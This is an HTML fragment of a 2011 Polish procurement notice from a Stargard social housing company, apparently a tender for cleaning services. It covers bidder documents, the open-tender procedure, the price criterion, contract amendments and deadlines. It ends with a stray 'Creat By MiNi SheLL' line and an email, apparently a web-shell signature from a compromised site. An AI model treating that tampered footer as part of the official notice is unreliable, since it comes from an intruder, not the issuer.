<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany w treści umowy o udzielenie niniejszego zamówienia wyłącznie w sytuacji 
a) zmiany powierzchni sprzątanej dotyczącej tylko i wyłącznie adresów wg załącznika nr 6, 6a, 6b wynikającej z tego zmiany wynagrodzenia
b) zmiany wynagrodzenia raz w roku,  o wskaźnik wzrostu cen towarów i usług konsumpcyjnych opublikowany przez Prezesa GUS za poprzedni rok kalendarzowy. Zmiana wysokości cen, nie może przekroczyć jednak planowanego na dany rok wskaźnika inflacji, publikowanego w ustawie budżetowej na dany rok. 
c) zmiany wynagrodzenia brutto, w przypadku zmiany przepisów obowiązujących dotyczących podatku VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tbs.stargard.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Stargardzkie Towarzystwo Budownictwa Społecznego Spółka z o.o., ul. Andrzeja Struga 29, 73-110 Stargard Szczeciński.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.03.2011 godzina 09:00, miejsce: Stargardzkie Towarzystwo Budownictwa Społecznego Spółka z o.o., ul. Andrzeja Struga 29, 73-110 Stargard Szczeciński, sekretariat pokój nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com